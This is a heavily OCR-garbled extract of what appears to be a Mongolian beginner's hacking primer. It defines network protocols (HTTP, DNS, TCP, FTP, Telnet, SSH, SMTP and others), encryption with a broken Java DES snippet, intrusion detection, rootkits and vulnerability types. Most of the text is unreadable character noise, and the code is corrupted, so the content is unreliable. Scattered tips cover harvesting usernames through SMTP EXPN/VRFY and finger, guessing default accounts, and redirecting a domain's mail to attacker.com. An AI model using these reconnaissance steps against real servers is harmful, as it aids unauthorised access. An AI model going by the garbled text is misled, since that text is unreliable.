acax Maaaannvva (cookie) rax Ma:.I nt ernet Explorer,MozillaFirefox,Opera,Net scaperax Ma: :a naun eaep:y:aMxaparnaaaraapaysepyyaaaar.3araapnuxaparnaarus xapsuyynan: I nt ernetExplorer - 84,03 %Firefox- 10,7%Safari - 3,.25 %Net scape - 0,98 %Opera - 0,57%29- Fi r ewal l-XvuonrouxvccauveaaakoMnsk:epnvvunusuaa:apuuaaaaron aapan:xnxaaMamaMapxauaxonuo.TnMaacraauaacxauaax onoMxnrxssraapnaxerexxapar:aaaar.Yvunrrvua:raaarsvn onFan:xaua(Firewall)xaMaaxnporpaMkM.3uaussusvpnuraaub uaa:pan:vvanr xaaaar. Fan:xauausraaaaaaao:ooaracau2:epenaaar.Faaaaaraaar us :ouor :exeepeMxnu :vamnua spnraax araa ereea router rax na uapnaaar :exeepeMx us ao:poo ran: xaubr aryyncau aaar.Bo:ooa raaar us nporpaMbu :vamnua spnraax araa onuo. 3apnM vnannucnc:eMeep:eeran:xaubraryyncauaaar.Xapaa:aub vnannu cnc:eMa aua nporpaM cyyraarv aaan :a xyanu ran: xaubu nporpaMbr onx aau cyynraapa.- HTTP -3urnuaapxananHypertextTransferProtocolusnaunaavsaxaa amnrnaaarnpo:okonkM.Tanaaaxyyaacvsaxaaaaxnaaaaavsaru nporpaM(!nternetExplorerraxMa:)aaapaaht t p: / / www.hacker.mnrax nuaarnr cauax araa ax. 3ua us HTTP npo:okonbr amnrnaxaa saax eru aua racau vr. Xapaa FTP npo:okon amnrnax on ftp://ftp.hacker.mn rax saax erue. HTTP xvcan: (request) us aapaax xanap:a aua.GET/ images/ logo.gifHTTP/ 1.1 -I magesdonaepooclogosyprnr vsaxnrxvccauaua.BnaunpaysepaaapnucaukM,uaauaanMn xanap:a aua.HTTP-auaMau:epnnuMe:oaaua.HEAD,GET,POST,PUT, DELETE,TRACE, OPTI ONS, CONNECTrax Ma:.Xapnu HTTP xapnyn: (response) aapaax xanap:a aua.HTTP/ 1.1 200 OKDat e:Mon, 23 May200522: 38: 34GMTServer:Apache/ 1.3.27 ( Unix)(Red-Hat / Linux)Last -Modified:Wed, 08 Jan 200323: 11: 55GMTEt ag:"3f 80f-1b6-3e1cb03b"Accept -Ranges:byt es30Cont ent -Lengt h:438Connect ion:closeCont ent -Type:t ext / ht ml; charset = UTF-8- HTTPS -HTTPonmyya:ekc:xanapaapaaaaMxnraaar,nMaacsaMaacus XakepapsxaaanmyyayumnraaxonoMx:o.HMaMaaaannnr xaMraanan::aaaMxyynaxsanmrvmaapanararapunpua.HTTPSon SecureSockerLayer( SSL)a HTTP xopbu xaM:apcau vn axnnnaraaub vp avuraap aaapx acyyanbr mnaaar. us vpnu ca: xacax saaxaaa :a paysep aaap ht t ps: / / rax rapu npaxnr ausaapcau ax. HTTPSxonon:brxaparxvvnaxnu:ynaaxnaaaAaMnunc:pa:opus aacepaepaaapaapublic:vnxvvpvr:acep:ndnka:vvcraxxapar:a aaar.LinuxaaaponOpenSSLamnrnaxvvunrxnaar.Huracuaap aaMxnraaxyMaaaananxepavvnaraax(encrypt ) myyayumnx onoMxrvonuo.naurysakpean:kap:buayraapraxMaaaanan aaMxnraax araa vea aua us Mam uyxan.- IP xasr -!nternetProtocolraaaruscvnxaauaxonoo:oaraavx koMnsk:eponou:vvu:aaann:raxsvncnrxoopouaussnrax sopnynan::araxonroxonuo.I PxasrnranuaMnkac:a:nkrax xopaurnnua.BnuaMnkusDial-upraxMa:xonon:oopopaoron :yxaunu:epua:nuvnunnraavsvvnarukoMnaunac(!SP)aa:oMa:aap onroraouo. DynamicHost Configurat ionProt ocol(DHCP)anuaMnkaap vvunr xonouo. Xapaa c:a:nk I P xasr:a on DHCP-a :oxnpyynx erue.Oaooroop I P-nu + aax xyannapbr amnrnax araa ereea yaaxrv I Pv6rapaxonuo.I Pv4usayycaxonoxoopxaMxaauaxvpaaaacau on oaoo cauaa soaox svnrv onxaa. 31I Pv4us 4,294,967,296(232) mnpxar ax onoMx:o acau on !Pv6 us340,282,366,920,938,463,463,374,607,431,768,211,456(2128) mnpxar ax onoMx:o kM. !PxasrMaausuaauaaon3232238858nM:ooaaar.Yvunr xapaaa :a !P xasr nm aua rax xanx Maraarv kM. Yvunr xepavvnan aapaax!Pxasr192.168.13.10rapunpua.axxepavvnarnrxapsn aaa.192 = 11000000168 = 1010100013=0000110110=0000101032 n: :oo araa ns 11000000101010000000110100001010.3ua:oormyyaapaa:bu:oononpyyxepavvnan3232238858rapunpx araakM.Xapaaht t p: / / 3232238858nuraxopyynanununpaysep 192.168.12.10 pyy xvprax onuo.- DNS -DomainNameSyst emuscvnxaauaax!Pxasryyabrxaparnaruaaa xaparnaxaaaMaponroxerexvvpar:a.Xnmaananxvuonrou 6/.+3.2.2+9raxMa:onou:oouyyabruaaxnnxuaaaxrv:ynxaparnaxaa aMaponroxvvauaac!Pxasrnrwww.hacker.mnraxMa:vronrox xapransyynaar.BoMau uapnr aapaax :vamnua xyaaaaar. Yvua:1. TopLevelDomains( TLD) .Xnmaaus:http://www.hacker.com1980-aaaouooc.net,.org,.edu,.gov,.mil,.intaoMauyyarapu npcauereeaseaxeu.com,.net,.orgaoMaubrxyaanaaanx onaoraycabrusseaxeusopnynan:aapusamnrnax :oxnonaonaseameepenonroaor.2001ouooc.info,.biz,.name, .pro aoMauyya rapu npcau.2. SecondLevelDomains.Xnmaaus:http://www.hacker .com-Toauxouaoo on naun xyaanaax aau onaor aoMauyya kM.3. ThirdLevelDomains.Xnmaaus:http://hacki ng.hacker.com-BnaunxanxsaumcauaaponSubdomainkM.XapaaaSecond LevelDomain-:aonxoc:oocooxaMaapuSubdomain-r xssraaprv uaax xaparnax onaor.324. CountryCodeTopLevelDomain(ccTLD).Xnmaaus: ht t p: / / www.hacker.mn -Tycraap:or:uocouynconrouaeepnu racauaoMauuapaaarereeaNouronyncbuxyasaon.mnkM.3apnMyncbuaoMaubrTopLevelDomainMasraap amnrnaaar.DNSonycabukoMnsk:ep:uyyuaapuaa:paxuexuenaxaMrnu ay:yyvuanaracauvnunnraaunuarkM.DNSonxaMrnuuaaan:aus kM.3eaxeuDNS-nrxyypcuaapkyxnxonoxbrxapuraas.Bnvn axnnnaraaub:anapbuauxaaruDNScepaepnuvpauxsuan:brxnx auaraxvsse.3uaxnmaauavnaxnnnaraaub:anapbuuarnr hacker.mnraxvsse.hacker.mnxopNXnunar:a,uaruspri10-hacker.com rax ueree us pri 20-cracker.mn rax :aMaarnaracau aua. Bn pri 5 aaap eep uar NX nunar opyyncau :araaa :vvunr attacker.com pyy saacauraxvsse.Yvunvpavuakyonoxaa?hacker.com-annraacau vxManattacker.comaaapnop:25pyyasnaxonuo.attacker.com aaap:vvunruenee:uaraapyumnxonuo,:araaaaaxnaaNX10-pyy unrnvvnua. Fa:an xnuxaua asaa vvunr Maaaxrv ax onuo. - TCP -TransmissionCont rolProt ocolusnu:epua:aaxronxaparnaraaar npo:okon kM. TCP us dan aaMxyynax onou raaaaavnunnraauvvanr uaaaap:aaaMxyynan:buapraaprvua:raua.3uauaaaap:a aaMxyynan:raaarusereraensMapaacaapaanan:arapcau:vvraapaa npaxnr xanx araa ereea Meunnraaracau ererannu nok vpa :oou y:raxapransyynxaMxnn::aaaMxnracaubrMaaaraaua. TCPus OSIMoaennu t ransportxacar: aua.TCP ereraen aaMxyynaxaaa aapaax rypaau anxMbr aaMxnua.1. Xonon: vvcraua.2. Oreraen aaMxyynua.3. Xonon:br sorcoouo.- FTP -FileTransferProtocolusererannr:vpraumyypxauaaaap:a aaMxyynaru kM. Yvunr amnrnax FTP cepaepaac dan :a:ax acaan dan 33FTPcepaepnvvxyynaxnpoueccbrrvua:raua.FTPus20,21nop:br amnrnaaar.FTP-aapdanaaMxyynxaxaasnifferapsxaaaxonoMx:o yupaac SFTP ( SSHFileTransfer Prot ocol), FTPS ( FTP SSL) -nr amnrnaaar.FTPamnrnaxdanaaMxyynaxbu:yna:ycracut uFTPMa:nporpaM amnrnaxonuo.3caannu:epua:paysepaaapaaaapaaxaanaap nunx opx onuo.ft p(s) ://< login> :< password> @< ft pserveraddress> : < port >- Tenae1 -Tenue:npo:okonbusopnnrousuanaaaepeuxn,xopunrnana yanpanara:a.Tvvunroncauaaus:epMnuanvuaac:anpoueccyyabu xoopouaaaxsnu:epdecnuc:auaap:brnonroxsaaankM.Tenue: useepkoMnsk:epnvvuaa:paxaacraaua:vvuaaapvnaanxnx onoMxnr onrouo. Haan::araxoaoxoaxaMrnunxeuapeepvuanaraaxnop:on Tenue:nop:kM.Haan::aTenue:nop:usnxaaunauUN!Xaryynaru ykyunrnvvnarunrsaaaar.3apnMaaaAS+00ykyepanuxaMxaa:a koMnsk:ep onaox onuo. Bna saraaa uaan::a Tenue: nop:br counpxox auaaa?raaanxopman:raauaua.Haravraap::aryynaruussoxnx coopxaMraanaraaarvnaanaxaaMaapaM:rnereranvvanraryynx onuo.Xopaaxsman:raauusUN!Xaryynaruusxncaaprelaunch" :anakM.Bnvvraapkyraxraxauaaa?raaan:avxautoolbox-oo :onrokoMnsk:ep:auaanxonuo.3uaus:anxaaunauaua:onro koMnsk:epaacunrnaraaarvykyfirewalledaryynarunauaa:pax uaaaap:aauaracauvr.Tatoolbox-ooauaanxuaaaxrvuracau:a unrnvvnaruaacacaanUN!X:onrokoMnsk:epaaceep(ao:ooa):onro koMnsk:ep::enue:naxuaaaap:aaua.Bnashell-nr(acaan unrnvvnaruprompt)saxonxaaaxaa?Hxaaunauxaparnarunuuapa uyyuvrmaapaaraaar.3apnM:oxnonaonaseaxeuxaparnarunuuap maapaaraaar. Neu sapnM :oxnonaona Cisco unrnvvnarunu xyasa seaxeu uyyuvrmaapaaraaar.Toapyynannaauaxopyky:vvuaacara svn"xapar:a,:apusxaparnarunuuapacaanuyyuvr.Bnaauaxop svnnr sax onox aa? Xaparnarunu uapnr onox xaaau apra n:341. 3apnMunrnvvnaruaUN!Xaryynaruus:auap:uyyuvr opyynaarvacauuracauypyyxaparnarunuuapopyyncubr xanua. 2. Hop: 25-pyy :enue: xn, :araaa EXPN a vRFY koMauabr erexnr oponaooavs.EXPN-aepre:renacaanabuse,info,list,allraxMa: xarcaan: xnx rax vs. Hxaux :oxnonaona aaraap us xaparnarunu uapnr xvunu:a onroxbr saaaar. 3. Aryynaruaaapxaparnarunrcourooavs.BnaauaapnM:nunr: xoxnM us courox aprbu :anaap vsax onuo. 4. HaprvFTP-roponaooa vs,:araaauyyuvrnronr.M.Xaanraap :apusxanxnaracauaxonoauxvunu:axaparnarunuuapnr nnpvvnx onuo. 5. Baxrvxaparnarunuuapnrxaparna.www.aaapaxrv xaparnaru a uyyu vrun caxau xarcaan:br onx onuo. 6. test",demo",test01"saparun:narxaparnarunuuapnr opyynaaa vs. 7. Aryynarunuuapnracaanaryynarunuuapuaacxaparnarunu uap onou vvccau uapnr xaparna.8. Aryynaruaacepaepxnxauayyraxvs,:araaaaaxyyacbr xap.Taxvnaaxacuaacaannvvnxnrcypcauaxc:o, Cont act" racauxacrnr vs :araaa :a sapnM xaparnarunu uapnr onxuaaaxusyyvs.Baxyyacbrvscauaap:auaxaparnarunu un:nar uapnr onoxoa :ycanx Maraarv. 3anuraaaoaoo:avxauaxonoxxaparnarunuunnaaayp: xarcaan::aonnoo.3araapxaparnarunaaraaacaxnra:nax xapar:a.Xapaanaxaparnarunaxvunu:aauaraarnra:anx uaaaxrvonna:vvunr:enue:nunpo:okonoopmanraxxapar:a onuo.Bnaauaacnuyyuvrxapar:a.XapaMcan:ausuyyuvrnr a:naxxsnapycaaar,:auapvvunrrapaapmanraxxapar:a onuo. - Encrypt i on -Encryption us auxub Maaaannnr xyanprax a vvunr us aurnu yky uaaapMaaaananraaar,xyanpcauMaaaannnrundpauykykoanoracou MaaaananraxaaaraapusmyyayumnxonoMxrvaaar.Xyanpcau 35Maaaannnr us Fpeknu kryptos raaar vruaac rapan:a crypt ogram raaar vraap uapnaaar.Xapaa encrypt ion us saxnaan nnraacun aapaa aua us asauaaa xvpcau aaanacparvnaan(decrypt ion)onoxundpauMaaaananusyuaaa aurnu Maaaananaaa yuaar aua.Naaaannnuxyanpran:busMapaxaacman:raanauencrypt ion-b xnxvnaanonouavpaMusaMapxauacaankoMnnekcaxbr :oaopxonaoraua.Hxauxencryption-bvnanvvausxsnapxau Ma:eMa:nkvnanvvaaaar.Neu:vnxvvpraxuapnaraaaruyyunaraMan koayyabrxaparnaaaraua.TvnxvvpussMapuarauuyyuvr:aaxa MaaaannnrnnraacauxvMvvcnMaaaar.Huracuaapencryptionus aa:oMa:aap koabr yumnx :ausaar onuo.Epanukoayya:aaann:aub:vnxvvpvr:ausmyyaMaaaannnr eraerrv.Xapnuopouaus:oaopxoavpMaapMaaaannnrxyanpraaar aua. Tvnxvvp vraap uyyunaracau Maaaanan us xyanpu Maaaanan onaor on xapnu :vnxvvp vrrvraap Maaaanan us :anaraaxrv. XaMrnu uyxan us encryption-b xvu us sMap u svnaap :anx, aaaax uaaaxrvereeaxapnuuarxyrauaaubxyasaxooxouyaaauaaar. 3axnaan us aaaaraax onox onoau vvunr seaxeu cynep koMnsk:epyya n aaaax uaaaar yunp nnvv uaaaap:a aaar.HyyunanEncryptionusuyyunanbrxaaranaxaaaMamcau.Xauuarau:aub koMnsk:epacaancvnxaaua:ausuaa:apuMaaaannnrunusxynranx uaanaa raxaa Maaaanan :aus ky aua aa raarnr u Maaax uaaaxrv kM.Hapnu soxnou aryynan:EncryptionusMeuMaaaannnuuapnuusr:usMaaanbu:an aaapcauaaar.NaaaannaauyyunaraMananraxaaencryption-b avpMvvaMamnxeuaepauxonoraon:o.Uaprnu,cauxvvrnusapar onou uyyunaraMan Maaaannvva us euaep soxnou aryynan:br maapaaar Maaaannvva ereea aua vranr encryption-a uaaax onuo.Boan: aaanNeuencryptionus:aubMaaaannnroan:o,vuauaanbrxaurax ereeavvunrxaparnaxvscauxvMvvcuo:onaorkM.TauaMaaaannnu xooxouuracauxacrnrxausayyncauraarnrus:oapyynxerareepee raxan:a. 3ua us cauxvvrnu onou xyynnu canapbuxaua Mam uyxan kM.36N3O 5-p syyua Cnap:akyya Mam counpxon:o undpnu eepunen:nu aprbrxaparnaxaxaa.HenonouuecnaubvenuaauaCnap:akbu yanpaarunayp:uapnxauuyconcouanrauuaacbrxaparnaaaracau ereeavvunraa:aurapnuvnrapraaarax.3uaxvvsaxnauby:rbr raruxvv Cnap:akbu nunr vcrnu xvMvvc n :anx yumnx uaaaar acau aua. Encryption-ua xop :epnnu undp aaar.Undpnueepunen:-Bn:nu:or:couxaMxaa,ycaamnuxvvaMeu xaaracau Maaaannnr aaxnu eepunex.Undpnuopnyynan:-Haaax:ayn:vva,mnux,Meuxaaracau Maaaannnr opnyynax.Nam aurnu undpnueepunen: onou auxub :ekc:nr xonscou rax onrox onuo. 3ua y vx undp, auxub :ekc:vva us xonnnacou aaar. NeuMamaurnuundpnuopnyynan:,auxub:ekc:nuvcrvvausycaa vcar,:oo,acaan:aMaar:aapconnraaor.HMapxvv:epnnuundpvvaus auxub vcrvvanu apnan us xonnnacou aaar.OpunuvenuCryptographic-bucnc:eMusxopvuacauka:eropna xyaaaraaar.Pirvate:vnxvvpnucnc:eMusrauuxau:vnxvvpxaparnaaar.Tap :vnxvvpusencryptonoudecrypt-buMaaaannnramnrnaaar.Tycaaa rauu:vnxvvpusMaaaannaasapaxykyxyaanaaanaxxop:anamnrnax onoxaxapnuxop:an:vnxvvpaauyyunaxc:o.Encryption-b akynrv aaan us :vnxvvpaa xap uyyuancuaac n man:raanaar aua.Public :vnxvvpnu cnc:eM us xop :vnxvvp amnrnaaar ereea aua us publiconouprivate:vnxvvp.Xnmaaus:KoMnsk:epnucvnxaaua xaparnaru xyanu onou un:nu 2 :vnxvvp:a aaar. Xaparnaru private :vnxvvpnr uyyunax c:o ereea xapnu public xyasa uaan::a aaar.Private onou public :vnxvvp us xoopouaoo xonoo:o us rapuaarv. Xapaaa :a saxnanaa xyanu uyyu vraa amnrnax xaparnaaan xvnaau aaaru :auapublic:vnxvvpaapsayynaxonuo.Yunpusxvnaauaaaru:aub :vnxvvpnrMaaaxmaapanararvaaar.Xapaa:auasaxnaanyuax npaanrauuxau:aneepnuuyyu:vnxvvpnramnrnax:apxvv Maaaannnr aau uaaax kM.371960-aaxnauouoockoMnsk:epnuacyyaan,:vvun:exuonornuonouuyyunanbuacyyanyya,xyasxvunuyyusaparsvnc:vnxvv spnraax axancau aua. 3uaxvv c:auaap:bronou susbu sacrnu raspbu rapaauvva,Meuxyaanaaaubcnc:eMvvaaaamnrnaxaapxnracaua auaxvv c:auaap:br Data Encryption Standard (DES).publicSt ring encrypt (St ring plainText ) {DESKeySpec keySpec = new DESKeySpec(encrypt Key) ;Secret KeyFact oryfact ory = new Secret KeyFact ory.get I nst ance( DES );Secret Key key =fact ory.generat eSecret (keySpec);Cipher cipher =Cipher.get I nst ance( DES );cipher.init (Cipher.ENCRYPT_MODE,key);byt e[ ]ut f 8t ext=plainText .get Byt es( UTF8 ) ;byt e[ ]enrypt edText=ecipher.doFinal(ut f 8t ext );ret urn Base64Encoder.encode(encrypt edText );}- I nt rusi on Det ect i on Syst em -3uakoMnsk:eponoukoMnsk:epnucvnxaauaaxssMapaaaceper vnanvvanr:auaaxaaarxaMraanan:bucnc:eM.Xakepyyabuonou anpycnuxnxyvnanvva,:yxanan:Haan::anop:xaxaaccaprnnax,:aaunrnnpvvnxasauaaaaoxnoeruMaaaraax,caxnrvxn vnannrsorcooxuaaaap:acnc:eMkM.Epeuxnausaapan:bractive (naaax:a) a passive ( naaaxrv)rax xop xyaaaaar.Tvvuunau aua cnc:eM us ceper axnnnaraar xop xyaaax vsaar.- KoMnsk:epnuao:ooacvnxaaao:poocykyaryynnarbu axnnnarcaa ayuaaac sayynx araa- Faaaaa opunu yky nu:epua:aac xakepyyabu sayynx y vnaan sapraap snrax uaaaap:a aaar. Cnc:eMnuvuaacusCeucopykyMaapvvnaua.Naapvvnvvasus vpnu opon:yyabr Maaapu :vvunraa :ea aas pyy sayynua Naapvvn us vuacauaaa 3 xanapaap Maaaannnr manrax aaar: - Harau: ceper vnaana vp:raracau vnannu cau- Cnc:eMnunor,koMnsk:epnudancnc:eMnu:oxnproo, xaparnarunu apxnu :oxnproo rax Ma:... - Auditt rails - yky vnannu mnux aaan 3ypraac v:unr us nnvv :oaopxo xapx onuo. 38Apxn:ek:yp v:unu xyasaTeanepceu yky centralized (uarfirewall-aapaaMxyynau),TapxcauykyDistribuited(:oMcvnxaaunxyasa) saraap:a aua. - Fi nger-Fingeron :aub:eceencueec nnvv uexuena xaparnaraaxuaaua. Finger-:a asnax sapnM counpxon:o asnnbr aau vsse.Map uar ouunousaacau xaparnarunu uaprvfingerkoMaua us vx xaparnarunr cepaepaaap aprax auaanax onuo.FingerkoMauabu un:nar vp avu us aapaaxaanaap xaparaaua:>finger@196.xxx.129.66 [ 196.xxx.129.66]LoginName Tt y I dle LoginTime Of fice Office Phone davidsshShuaib pt s/ 1Sep1217: 35 (pc22285) rootroott t y1 1dSep 11 17: 03Xaparnarunu uapnr ouunou saacaufingerkoMaua us xaparnarunu:yxa nnvv nx Maaaanan eraer.39- SSH SSHon:exeepeMxvvanuxoopouaakynrvMaaaananaaMxyynax UNI X-nukoMMauanu:epdeckM.1995ouaauxSSHSecure-nrTat u Ylonensoxnocou.Slogin,sshascpracaurypaauvpanaaxvvuaac :or:ouo.SSHusRSAxaMaax:vnxvvpvraapMaaaannnruyyuanx aaMxyynua.ShellSSH-nudefaultSSHinstallus:aubrseaxeuencrypted xsuan:bu session-aap xauraaar. SSH-nr xaparnacun aaayy :an us :aub xsuan:busessionusencryptedaaarkM.3uaussapnMxvMvvc::aub ky xnx araar xapaxaa nx xauvv aaar racau vr kM. Tenue:nr nm SSH-nrxaparnax:yxaaeepuar:aa:a:anusraaanSSH-nusession us xynraa ep:aerrv :an kM.SSHusacSSH-nucyaar:araaycaaMaaaannnr:yuuensaaxaa xaparnaraaar. - SMTP -H-ManaaMxyynaarc:auaap:npo:okonereeaSimpleNailTransfer Protocolracauvrnu:oaunon.SNTP:aubrMaaaananuyrnyynaxaa:aua sapnM counpxon:o svnnr erex onuo. SNTPacbounce"Meccaxnnraacuaapcvnxaaunao:opnporpaM xauraMxnrnnpvvnaxaaxaparnaraaxonuo.HMMeccaxusaxrv xaparnarunannraaraaarMeccaxkM.Yrn-Manusnxauxao:ooan-Man cepaepvvanuvxsaMaapasnaxereeaaapaaus:auaxaparnaru :aunraaarv aua rax Maaaraax onuo. - POP3 -POP3useueeaepnu:epua:aaxxaMrnuun:narnpo:okonbuuar kM. 3ua us anek:pou myyaaur nporpaMa opyynaxaa xaparnaraaar. Baayy :anusPOP3-nunxauxvnunvvnarunaa-myyaaurcepaepaaap xaaranaar. HM Masraap a-myyaaurnu xyynapbr xnaar. POP4oaooroopuarnxaanrapaarvaraaueep:eePOP3mnux uauapaac raaua nnvv onou onoMxnr aryynx aua.40- NNTP -Network News Transfer Protocol us Usenet News rax uapnaraaar News vnunnraauvvanu xauaan:br raprax eraer. ARPA cvnxaau aax Maaaanan :apaax,xax,uyrnyynaxrvua:raaarnpo:okon.NNTPusSNTPaTCP xoynaurnux mnux uauapbr aryyncau aaar.- SNMP -SNNP on Simple Network Nanagement Protocol racau vrun :oaunon kM. Tap us aryynaru a unrnvvnarunr manrax yanpaaxaa xaparnaraaar. SNMP-nuxaparnaruanunxauxus:vvunrunrnvvnarunrmanraxaa, aaa:aMxnu yp:bu amnrnan:br vsvvnax a SNNP-bu xsuan:bu ep:eeua Meccaxnnraaxaaxaparnaaar.SNNP-nuxaMrnuun:narxsuan:bu nporpaMxauraMxonHPOpenviewkM.Haa:parunaSNNP-nrcvnxaar uaaxaaonoucvnxaareepunexyky:acnaxaaxaparnaaar.Aryynaru aaapx SNNP us syraa:a, :ap onou counpxon:o Maaaannnr nnpvvnaar. - ARP -AddressResolutionProtocolusdnsnkxasr:nu:epua:nuxasrnu apmnbr:or:oouo.3uausMaaaannnrunrnvvnaxaaaMnuuyxankM. ARP us OSIMoaennu Net work :vamnua aaar.- I CMP -!nternetControlNessageProtocoluskoMnsk:epvvanuxoopoua MaaaananaaMxyynaxveaanaaaubaxsuan:buaoxnoryanpaaar.!CNP uscvnxaauaaxacyyanyyabrouomnoxoauyxanvvpar:a.Tanaun cau Maaax ping koMaua us vvun uar xaparnaa.- DHCP -DynamicHostConfigurationProtocoluskoMnsk:epao:ooacvnxaaua axaa xapar:a vea us !P xasraap aa:oMa:aap xauraaar. 41- SSL -SecureSocketsLayerracauvrnu:oaunonereeaTCP/!PaaMxnx araaMaaaannnreuaepuyyunan:araapaaMxyynaxsopnnro:o.SSL amnrnax araaraa https://-p Meu aa paysepbu c:a:yc xacar: xaparaax SSLicon-pusMaaaxonuo.NeuSSLxaparnaxaraaca:paysepbu aooa euuer: uooxub sypar rapaar. Cepaep onou knneu: :anyyaaac SSL:ooucep:ndnka:onoupublic-private:vnxvvpaapuaa:paxapxnr manraaa:vvuasopnynxsessionvvcraua.Yvunrseaxeucepaeponou knneu::anyyan:anxyumnxuaaaxaapencryptxncauaaar.HM yupaacvisakap:buayraapMa:nrerneaerxyyaacuyyaaauaaavvunr amnrnacauaaar.Xapaavvunramnrnaxrvonvisakap:buayraap sMapuxvusaMaacusapnxonoMx:o.XapaMcan:ausSSL-r xakepaax saMaac us onx aaax onoMx ac aaar kM.- TFTP -TFTPon:aubuaskM.TFTPsMapuara:anraamaapaaxrv,:ap nxaaunau cvnxaaun :ouor :exeepeMxna onoMxnu uar: avpcaa onoxoa xaparnaraaar.nrnvvnaruTFTP-aUN!X/Windowsxapurnrcyynrax onuo, :araaa aua xapuaruaac eepnu avpcaa raprax aaua. TFTP us UDP npo:okonbr xapar:a onroaor. TFTPcepaepusuaa:parunasMapuardanbreep:eemnnxvvnax onoMxonroaor.Hnvvcvvnnuvenuxyannapus:aubrxvuvpnu yumnxonoxdanpyyopoxbrxssraapnaaar.Taraaa:aeepnreeFTP-:a:ec:anaanaxaaxopnracou"onoxbronxMaaua.TFTPaFTP xopbuxoopouaoxeepuarsnraausraaan:auap!s"koMauarvsMap danxvcaxaraaraaMaaaxxapar:aonuo.Faauaapaaus:auap aaxnaa sapnM Maaaannnu couron:br xnx onuo. - Root ki t-Xakepyyavpranxcnc:eMpvvuaa:paxmnuaaprasaMbrapxaaar. TaarootkitMa:svncnramnrnaxxanaaxonoMxoouaMaravvnaar. Rootkit raaar on uyyuaap cyyaar nporpaMbu xacar ereea eepee saaaan xopxoxnponyupyynaaraxanarv.Xakepununkyxnx,sMap 42nporpaMamnrnaxaraa:yxaMaaaannnruyrnyynaxbu:ynavvunr amnrnaaar. - Vul nerabi l i t i es, Thr eat s, Count er measures -KoMnsk:epnu cnc:eMa akynrv aaan:a xonoo:o 3 vr aaar. vulnerabilities,threats,countermeasures.3araapnropuyynsraxaapuar vrun opoua v:au ervvnap :aanx xapar:a onooa aua. HMaac myya :anapbrusxanse.3apnMxvMvvcraaaaavrnrxa:Mouronunnx opuyynaaakyxanaaaaraausonroraoxooonsunxaor.Aurnnap rauuxauvrxanaaaonroxsvnnrxaaauervvnaponroxycabu :onror aprvvnaaa saxaa. Vulnerabilit y raaar on cnc:eMnu aMapxau xanaax onox uvx kM. Threat oncnc:eMaakyn:apnru.3uausxvu(cracker)acaansMap uarxaparcan(equipment )acaanvnaan(vepnvvnax,aoa:nox)uax onuo.Oepnuxeecnc:eMnrxananaraacxaMraanaxbrCount ermeasure rax uapnaaar.BvxkoMnsk:eponounporpaMavulnerabilit y(uvx)aaar.HMa xakepyya cnc:eM xanaaxaaa aaraap uvxnr amnrnaaar. 3araap uvxvvanr ao:op us aapaax aanaap aurnnaar.1nsnk uvx - 3ua on oan: aMsapanbu uvx kM. Xau uar :aub epeeua opx npaaa xapar:a dan vxn ancknr unus aaaaa saax onoMx:o. Barannu uvx - Yvua arannu akyn raMmnr opx araa kM. Yep, ran:vMap,rasapxeanen:raxMa:.Neu:oocmopoo,unrmnnus:aub koMnsk:epnuMaaaannnramnrnaxonoMxrvonroxonuo.Ta koMnsk:epnu Maaaannaa anaax uvx raxaap myya koMnsk:epnu cvnxaa oaoxonoxrvraarnrauaaacxaparaaxaua.HMa:orraua: :acpaxaac caprnnx :or apnru, xa:yy anckau aaapx xapar:a Maaaannaa CD rax Ma: svnc aaap ueeuenx aaaxbr seanex aua.HporpaMbua:exunknuuvx -TexunknuanaaauskoMnsk:epnu cnc:eMnrvxanausakynaopyynua.Lnua:exeepeMxcyynraxsauus :aubxaan::aacauxaMraanan:brouronroaor:oxnonaonaaar. HporpaMbuanaaarXakepyyaronayycnc:eMnrrauaaxsopnnroop amnrnaaar. Bydep avvprax, vepnvvnax rax Ma:aap. 43Orerannuuvx-Mapuarxanaaapnacauyky:aruyynxnx sopnnro:o danyyabr eepnu koMnsk:ep:aa xyynax. Xnmaa us Trojan, spyware.Xonon:buuvx-Tanu:epua:aaopoxaoodail-upraxMa:svncaap opaoronauausycaaa:aubcnc:eMnuuvxonxxaparaaua.Xnmaa usWireless-popoxoaMaaaannaaaraapaapaaMxyynxconnnuaor:yn saMaac us apsx aaax onoMx euaep aaar. MapucauxaMraanan:bucnc:eM:aanaa:auaAaMnuunusMyy Maanar:a on cnc:eM unus svraap n eeu uvxun uyrnyynra ax onuo. Threat -r ao:op us 3 aurnnaar arannu, cauaa:a, cauaauarv.Barannu raaar us eMuex:a nxnn y:ra:a.Cauaauarvraaar:MyyaaMnu:aacaanakynrvaanbu:anaaap MyyMaanar:aaxonuo.Xaparnarucauaauarvraapdanyc:rax, aaMnuuyyuvraryyncaudanbuxauaaxapxnreepunexsapraaconx onuo.Cauaa:araarnrraauaacaao:poocraxxopaurnnua.Faaaaa areu:veamnuaapnporpaMcyynraxveaao:opusaxaraaa nporpaM:axaM:cyyxcnc:eMakynyupyynaar.NeuTeppopnc:rax aaarereeaaaraapusnxcypryyns,mvvxraxMa:aryynnarbu koMnsk:epnvvxanaaar.3acrnuraspbucauaarsoaooaoruaraapan: us DoS aapan: kM.KoMnsk:epnu raM: xapar Xakepyyaaa amnr:a nsuec kM. Map uar aryynnarbuMaaaannnrxyynxaaaaa,xnuxaunrusyc:raaaxapaa xancauMeurnruserexrvonxapar:adanbrusyc:rauarax cvpavvnaar.HxauxxaMraanan:bucnc:eMraaubaapan:aacxaMraanaar.Faau vuauaaa xananarbu 80 opunM xyas us ao:pooc aaar. Xnmaa us axnaac us xancau axnn:au. Taa uyyu Maaaannvvanr us epcenaeruna us erexeec aaxyynaaa ky u xnx onuo.Naaaannaa xaMraanax onou apra aaar. Baap aypsacau anaaauyyabr rapraxrv axaa n :a xaMraanx aua racau vr mvv aaa.OrerannrencryptxnxusxaMrnucauMaaaananxaMraanan:kM. Yvunr seaxeu apx vxn xaparnaru n xaparnax onoMx:o aaar. Xapaa aypbuxaparnarudecodexnxraxoponaaonvuacau:vnxvvpnrus MaaaxrvyupaackyusMaaaraaxrveeu:aMaar:onxxapua.Faau cepaep aaapx private key-r onx aacuaap aMapxau :anax onoMx:o.4445- 6vnsr 3 -Ba xakepaax I mpossiblit y:A word only t o be found in t he dict ionary of fools. - N. Bonapart4647- Bs xaxeppax vapsc -Ba xakepaaxaaxaMrnunx xaparnaraaar nporpaM( t ool)ky aa? rax uaaaacxauuarusacyyaannxapnyauswebbrowser(I nt ernet explorer, Firefox,Net scaperaxMa:) raxxapnynua.Tasaraaaaurnuaavsaar nporpaMbr nurax xancunr raxax araa ax. YvunrXy:ra"-:axapsuyynxonroxonuo.Xnmaaus,:axy:rbr 